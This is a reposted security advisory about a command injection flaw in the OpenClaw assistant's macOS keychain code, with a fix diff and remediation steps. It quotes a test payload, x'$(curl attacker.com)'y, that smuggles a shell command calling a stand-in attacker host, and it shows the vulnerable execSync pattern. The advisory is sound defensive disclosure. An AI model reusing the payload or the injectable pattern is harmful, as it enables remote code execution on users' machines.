DEV Community

CVE Reports
CVE Reports

Posted on • Originally published at cvereports.com

GHSA-4564-PVR2-QQ4H: OpenClaw Keychain Injection: When Secure Storage Becomes a Shell

#security #cve #cybersecurity #ghsa

OpenClaw Keychain Injection: When Secure Storage Becomes a Shell

Vulnerability ID: GHSA-4564-PVR2-QQ4H
CVSS Score: 8.8
Published: 2026-02-18

A critical OS Command Injection vulnerability in the OpenClaw AI assistant allows remote code execution via malicious OAuth tokens. By failing to sanitize inputs before passing them to the macOS 'security' utility, the application permits attackers to execute arbitrary shell commands with the privileges of the host user. This transforms the keychain credential management feature—designed for security—into a high-impact entry point for compromise.

TL;DR

OpenClaw's macOS keychain integration used execSync to store credentials, allowing malicious OAuth tokens to trigger Command Injection. Attackers can gain RCE by injecting shell metacharacters into the token response. Fixed in v2026.2.14.

⚠️ Exploit Status: POC

Technical Details

  • CWE ID: CWE-78
  • Attack Vector: Network (via OAuth response)
  • CVSS: 8.8 (High)
  • Impact: Remote Code Execution (RCE)
  • Exploit Status: PoC Available
  • Platform: macOS

Affected Systems

  • macOS (all versions)
  • OpenClaw < 2026.2.14
  • openclaw: < 2026.2.14 (Fixed in: 2026.2.14)

Code Analysis

Commit: 9dce3d8

Refactor keychain write to use execFileSync for security

- execSync(`security ... -w '${newValue}'`)
+ execFileSync('security', [..., '-w', newValue])
Enter fullscreen mode Exit fullscreen mode

Exploit Details

  • Internal Test Suite: Payload: x'$(curl attacker.com)'y demonstrates command substitution injection.

Mitigation Strategies

  • Avoid using exec or execSync with user input.
  • Prefer execFile or spawn which accept arguments as an array.
  • If shell execution is strictly required, use rigorous escaping libraries (like shell-quote), though this is discouraged.

Remediation Steps:

  1. Upgrade openclaw to version 2026.2.14 or later immediately.
  2. If you cannot upgrade, manually patch src/agents/cli-credentials.ts to use execFileSync instead of execSync.
  3. Audit your ~/.zsh_history and process logs for suspicious curl, wget, or bash commands originating from Node.js processes.

References

Read the full report for GHSA-4564-PVR2-QQ4H on our website for more details including interactive diagrams and full exploit analysis.

Top comments (0)